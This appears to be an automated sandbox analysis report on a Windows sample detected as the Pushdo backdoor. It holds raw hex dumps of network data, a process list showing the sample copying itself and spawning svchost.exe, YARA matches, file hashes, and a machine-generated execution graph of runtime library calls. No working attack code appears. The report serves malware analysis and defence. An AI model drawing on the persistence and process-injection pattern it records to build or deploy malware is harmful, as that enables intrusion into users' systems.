                                                                                                                                                                                                                                                                    Data Ascii: 77,225.59a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M49.47,216.82a2.17,2.17,0,0,1-1,2.82,3.17,3.17,0,0,1-4.22-1.19,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3
                                                                                                                                                                                                                                                                    2023-07-27 19:45:20 UTC3049INData Raw: 22 20 64 3d 22 4d 38 38 2e 34 32 2c 33 31 32 2e 31 38 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 38 38 2e 31 32 2c 33 30 33 2e 34 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 41 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2c 38 32 2e 39 2c 33 30 35 61 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30
                                                                                                                                                                                                                                                                    Data Ascii: " d="M88.42,312.18a2.18,2.18,0,0,1-1,2.82,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"></path><path class="cls-7" d="M88.12,303.4a2.19,2.19,0,0,1-1,2.83A3.2,3.2,0,0,1,82.9,305a3,3,0,0,1,.65-3.65,2.86,2.86,0
                                                                                                                                                                                                                                                                    2023-07-27 19:45:20 UTC3065INData Raw: 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 30 39 2e 38 33 2c 31 35 33 2e 32 35 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20
                                                                                                                                                                                                                                                                    Data Ascii: 1,.65-3.66,2.84,2.84,0,0,1,3.66.05,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M109.83,153.25a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67.05,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7"
                                                                                                                                                                                                                                                                    2023-07-27 19:45:20 UTC3081INData Raw: 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 34 38 2e 37 37 2c 32 34 38 2e 36 31 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 34 38 2e 34 37 2c 32 33 39 2e 38 33 61
                                                                                                                                                                                                                                                                    Data Ascii: 2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M148.77,248.61a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M148.47,239.83a
                                                                                                                                                                                                                                                                    2023-07-27 19:45:20 UTC3097INData Raw: 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 37 30 2e 34 38 2c 39 38 2e 34 36 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 37 30 2e 31 38 2c 38 39 2e 36 39 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32
                                                                                                                                                                                                                                                                    Data Ascii: 69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M170.48,98.46a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M170.18,89.69a2.16,2.16,0,0,1-1,2.82
                                                                                                                                                                                                                                                                    2023-07-27 19:45:20 UTC3113INData Raw: 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 30 39 2e 34 32 2c 31 39 33 2e 38 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 30 39 2e 31 33 2c 31 38 35 2e 30 35 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38
                                                                                                                                                                                                                                                                    Data Ascii: ,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M209.42,193.82a2.17,2.17,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"></path><path class="cls-7" d="M209.13,185.05a2.17,2.17,0,0,1-1,2.82,3.18
                                                                                                                                                                                                                                                                    2023-07-27 19:45:20 UTC3129INData Raw: 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 34 38 2e 33 37 2c 32 38 39 2e 31 38 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 34 38 2e 30 37 2c 32 38 30 2e 34 31 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 37 2c 33 2e 31 37
                                                                                                                                                                                                                                                                    Data Ascii: 9,0,0,1,.2,3.62"></path><path class="cls-7" d="M248.37,289.18a2.18,2.18,0,0,1-1,2.83,3.17,3.17,0,0,1-4.22-1.19,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M248.07,280.41a2.16,2.16,0,0,1-1,2.82,3.17,3.17
                                                                                                                                                                                                                                                                    2023-07-27 19:45:21 UTC3145INData Raw: 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 37 30 2e 30 38 2c 31 33 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 36 39 2e 37 38 2c 31 33 30 2e 32 36 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d
                                                                                                                                                                                                                                                                    Data Ascii: "></path><path class="cls-7" d="M270.08,139a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M269.78,130.26a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-


                                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                                    Target ID:1
                                                                                                                                                                                                                                                                    Start time:21:42:33
                                                                                                                                                                                                                                                                    Start date:27/07/2023
                                                                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\PIyT9A3jfC.exe
                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                    Commandline:C:\Users\user\Desktop\PIyT9A3jfC.exe
                                                                                                                                                                                                                                                                    Imagebase:0x1180000
                                                                                                                                                                                                                                                                    File size:647'680 bytes
                                                                                                                                                                                                                                                                    MD5 hash:CA67C9C17A701B0664B90DE372ACDFB1
                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_Pushdo, Description: Yara detected Backdoor Pushdo, Source: 00000001.00000002.817368079.0000000001330000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                    Reputation:low

                                                                                                                                                                                                                                                                    Target ID:3
                                                                                                                                                                                                                                                                    Start time:21:43:03
                                                                                                                                                                                                                                                                    Start date:27/07/2023
                                                                                                                                                                                                                                                                    Path:C:\Users\user\pigalicapi.exe
                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\pigalicapi.exe"
                                                                                                                                                                                                                                                                    Imagebase:0xfb0000
                                                                                                                                                                                                                                                                    File size:647'680 bytes
                                                                                                                                                                                                                                                                    MD5 hash:CA67C9C17A701B0664B90DE372ACDFB1
                                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_Pushdo, Description: Yara detected Backdoor Pushdo, Source: 00000003.00000002.815888056.0000000000F20000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                    • Detection: 26%, ReversingLabs
                                                                                                                                                                                                                                                                    Reputation:low

                                                                                                                                                                                                                                                                    Target ID:4
                                                                                                                                                                                                                                                                    Start time:21:43:11
                                                                                                                                                                                                                                                                    Start date:27/07/2023
                                                                                                                                                                                                                                                                    Path:C:\Users\user\pigalicapi.exe
                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\pigalicapi.exe"
                                                                                                                                                                                                                                                                    Imagebase:0xfb0000
                                                                                                                                                                                                                                                                    File size:647'680 bytes
                                                                                                                                                                                                                                                                    MD5 hash:CA67C9C17A701B0664B90DE372ACDFB1
                                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_Pushdo, Description: Yara detected Backdoor Pushdo, Source: 00000004.00000002.815888334.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                    Reputation:low

                                                                                                                                                                                                                                                                    Target ID:5
                                                                                                                                                                                                                                                                    Start time:21:43:37
                                                                                                                                                                                                                                                                    Start date:27/07/2023
                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                    Imagebase:0x970000
                                                                                                                                                                                                                                                                    File size:44'520 bytes
                                                                                                                                                                                                                                                                    MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                                                                                    Target ID:6
                                                                                                                                                                                                                                                                    Start time:21:43:59
                                                                                                                                                                                                                                                                    Start date:27/07/2023
                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                    Imagebase:0x970000
                                                                                                                                                                                                                                                                    File size:44'520 bytes
                                                                                                                                                                                                                                                                    MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                                                                                    Target ID:7
                                                                                                                                                                                                                                                                    Start time:21:44:05
                                                                                                                                                                                                                                                                    Start date:27/07/2023
                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                    Imagebase:0x970000
                                                                                                                                                                                                                                                                    File size:44'520 bytes
                                                                                                                                                                                                                                                                    MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                                                                                    Target ID:8
                                                                                                                                                                                                                                                                    Start time:21:44:24
                                                                                                                                                                                                                                                                    Start date:27/07/2023
                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                    Imagebase:0x970000
                                                                                                                                                                                                                                                                    File size:44'520 bytes
                                                                                                                                                                                                                                                                    MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                                                                                    Target ID:9
                                                                                                                                                                                                                                                                    Start time:21:44:37
                                                                                                                                                                                                                                                                    Start date:27/07/2023
                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                    Imagebase:0x970000
                                                                                                                                                                                                                                                                    File size:44'520 bytes
                                                                                                                                                                                                                                                                    MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                                                                                    Target ID:10
                                                                                                                                                                                                                                                                    Start time:21:44:37
                                                                                                                                                                                                                                                                    Start date:27/07/2023
                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                    Imagebase:0x970000
                                                                                                                                                                                                                                                                    File size:44'520 bytes
                                                                                                                                                                                                                                                                    MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                                                                                    Target ID:11
                                                                                                                                                                                                                                                                    Start time:21:44:38
                                                                                                                                                                                                                                                                    Start date:27/07/2023
                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                    Imagebase:0x970000
                                                                                                                                                                                                                                                                    File size:44'520 bytes
                                                                                                                                                                                                                                                                    MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                                                                                    Target ID:12
                                                                                                                                                                                                                                                                    Start time:21:44:38
                                                                                                                                                                                                                                                                    Start date:27/07/2023
                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                    Imagebase:0x970000
                                                                                                                                                                                                                                                                    File size:44'520 bytes
                                                                                                                                                                                                                                                                    MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                                    Reset < >

                                                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                                                      Execution Coverage:4.7%
                                                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                      Signature Coverage:8.1%
                                                                                                                                                                                                                                                                      Total number of Nodes:1217
                                                                                                                                                                                                                                                                      Total number of Limit Nodes:23
                                                                                                                                                                                                                                                                      execution_graph 9238 1189b1b 9239 1189b26 9238->9239 9243 1189b36 9238->9243 9244 1189b3c 9239->9244 9242 118a6da _free 20 API calls 9242->9243 9245 1189b55 9244->9245 9246 1189b4f 9244->9246 9247 118a6da _free 20 API calls 9245->9247 9248 118a6da _free 20 API calls 9246->9248 9249 1189b61 9247->9249 9248->9245 9250 118a6da _free 20 API calls 9249->9250 9251 1189b6c 9250->9251 9252 118a6da _free 20 API calls 9251->9252 9253 1189b77 9252->9253 9254 118a6da _free 20 API calls 9253->9254 9255 1189b82 9254->9255 9256 118a6da _free 20 API calls 9255->9256 9257 1189b8d 9256->9257 9258 118a6da _free 20 API calls 9257->9258 9259 1189b98 9258->9259 9260 118a6da _free 20 API calls 9259->9260 9261 1189ba3 9260->9261 9262 118a6da _free 20 API calls 9261->9262 9263 1189bae 9262->9263 9264 118a6da _free 20 API calls 9263->9264 9265 1189bbc 9264->9265 9270 1189a02 9265->9270 9276 118990e 9270->9276 9272 1189a26 9273 1189a52 9272->9273 9289 118996f 9273->9289 9275 1189a76 9275->9242 9277 118991a CallCatchBlock 9276->9277 9284 118af81 EnterCriticalSection 9277->9284 9280 1189924 9282 118a6da _free 20 API calls 9280->9282 9283 118994e 9280->9283 9281 118995b CallCatchBlock 9281->9272 9282->9283 9285 1189963 9283->9285 9284->9280 9288 118afc9 LeaveCriticalSection 9285->9288 9287 118996d 9287->9281 9288->9287 9290 118997b CallCatchBlock 9289->9290 9297 118af81 EnterCriticalSection 9290->9297 9292 1189985 9293 1189be5 _abort 20 API calls 9292->9293 9294 1189998 9293->9294 9298 11899ae 9294->9298 9296 11899a6 CallCatchBlock 9296->9275 9297->9292 9301 118afc9 LeaveCriticalSection 9298->9301 9300 11899b8 9300->9296 9301->9300 8292 118b4bb 8293 118b4cc 8292->8293 8295 118b3b9 8292->8295 8315 1189c30 GetLastError 8295->8315 8297 118b3c6 8335 118b4d8 8297->8335 8299 118b3ce 8344 118b14d 8299->8344 8302 118b3e5 8302->8293 8303 118bd19 __onexit 21 API calls 8304 118b3f6 8303->8304 8310 118b428 8304->8310 8351 118b57a 8304->8351 8307 118a6da _free 20 API calls 8307->8302 8308 118b423 8309 1189826 _free 20 API calls 8308->8309 8309->8310 8310->8307 8311 118b440 8312 118b46c 8311->8312 8313 118a6da _free 20 API calls 8311->8313 8312->8310 8361 118b023 8312->8361 8313->8312 8316 1189c4c 8315->8316 8317 1189c46 8315->8317 8319 118a67d _abort 20 API calls 8316->8319 8321 1189c9b SetLastError 8316->8321 8318 118a8d7 _abort 11 API calls 8317->8318 8318->8316 8320 1189c5e 8319->8320 8322 1189c66 8320->8322 8323 118a92d _abort 11 API calls 8320->8323 8321->8297 8324 118a6da _free 20 API calls 8322->8324 8325 1189c7b 8323->8325 8326 1189c6c 8324->8326 8325->8322 8327 1189c82 8325->8327 8328 1189ca7 SetLastError 8326->8328 8329 1189aa2 _abort 20 API calls 8327->8329 8364 118a63a 8328->8364 8330 1189c8d 8329->8330 8332 118a6da _free 20 API calls 8330->8332 8334 1189c94 8332->8334 8334->8321 8334->8328 8336 118b4e4 CallCatchBlock 8335->8336 8337 1189c30 IsInExceptionSpec 47 API calls 8336->8337 8342 118b4ee 8337->8342 8339 118b572 CallCatchBlock 8339->8299 8341 118a63a _abort 47 API calls 8341->8342 8342->8339 8342->8341 8343 118a6da _free 20 API calls 8342->8343 8551 118af81 EnterCriticalSection 8342->8551 8552 118b569 8342->8552 8343->8342 8556 1185e73 8344->8556 8347 118b16e GetOEMCP 8349 118b197 8347->8349 8348 118b180 8348->8349 8350 118b185 GetACP 8348->8350 8349->8302 8349->8303 8350->8349 8352 118b14d 49 API calls 8351->8352 8353 118b599 8352->8353 8356 118b5ea IsValidCodePage 8353->8356 8358 118b5a0 8353->8358 8360 118b60f ___scrt_get_show_window_mode 8353->8360 8354 118dc5f __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 8355 118b41b 8354->8355 8355->8308 8355->8311 8357 118b5fc GetCPInfo 8356->8357 8356->8358 8357->8358 8357->8360 8358->8354 8593 118b225 GetCPInfo 8360->8593 8669 118afe0 8361->8669 8363 118b047 8363->8310 8373 118c435 8364->8373 8367 118a654 IsProcessorFeaturePresent 8371 118a63f 8367->8371 8369 11895a0 _abort 8 API calls 8369->8371 8371->8364 8371->8367 8371->8369 8372 1189cb3 8371->8372 8376 118c490 8371->8376 8403 118c2e5 8371->8403 8406 118f424 8371->8406 8422 118c3a3 8373->8422 8377 118c49c IsInExceptionSpec 8376->8377 8378 1189cb4 _abort 20 API calls 8377->8378 8382 118c4c9 _abort 8377->8382 8385 118c4c3 _abort 8377->8385 8378->8385 8379 118c515 8381 1189826 _free 20 API calls 8379->8381 8380 118c4f8 8445 118e2e9 8380->8445 8383 118c51a 8381->8383 8389 118c541 8382->8389 8436 118af81 EnterCriticalSection 8382->8436 8386 118976a _abort 26 API calls 8383->8386 8385->8379 8385->8380 8385->8382 8386->8380 8391 118c5a0 8389->8391 8393 118c598 8389->8393 8399 118c5cb 8389->8399 8437 118afc9 LeaveCriticalSection 8389->8437 8391->8399 8438 118c487 8391->8438 8394 118c2e5 _abort 28 API calls 8393->8394 8394->8391 8397 1189c30 IsInExceptionSpec 47 API calls 8401 118c62e 8397->8401 8441 118c650 8399->8441 8400 118c487 _abort 47 API calls 8400->8399 8401->8380 8402 1189c30 IsInExceptionSpec 47 API calls 8401->8402 8402->8380 8449 118c0b0 8403->8449 8407 118f42d 8406->8407 8408 118f430 GetLastError 8406->8408 8407->8371 8528 119069e 8408->8528 8410 118f445 8411 118f4aa SetLastError 8410->8411 8421 118f464 8410->8421 8533 11906d8 8410->8533 8411->8371 8413 118f45e 8414 118a67d _abort 20 API calls 8413->8414 8413->8421 8415 118f472 8414->8415 8416 11906d8 ___vcrt_FlsSetValue 6 API calls 8415->8416 8418 118f486 8415->8418 8416->8418 8417 11906d8 ___vcrt_FlsSetValue 6 API calls 8419 118f49a 8417->8419 8418->8417 8418->8419 8420 118a6da _free 20 API calls 8419->8420 8420->8421 8421->8411 8425 118c349 8422->8425 8424 118c3c7 8424->8371 8426 118c355 CallCatchBlock 8425->8426 8431 118af81 EnterCriticalSection 8426->8431 8428 118c363 8432 118c397 8428->8432 8430 118c38a CallCatchBlock 8430->8424 8431->8428 8435 118afc9 LeaveCriticalSection 8432->8435 8434 118c3a1 8434->8430 8435->8434 8436->8389 8437->8393 8439 1189c30 IsInExceptionSpec 47 API calls 8438->8439 8440 118c48c 8439->8440 8440->8400 8442 118c61f 8441->8442 8443 118c656 8441->8443 8442->8380 8442->8397 8442->8401 8448 118afc9 LeaveCriticalSection 8443->8448 8446 118dc5f __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 8445->8446 8447 118e2f4 8446->8447 8447->8447 8448->8442 8450 118c0bc 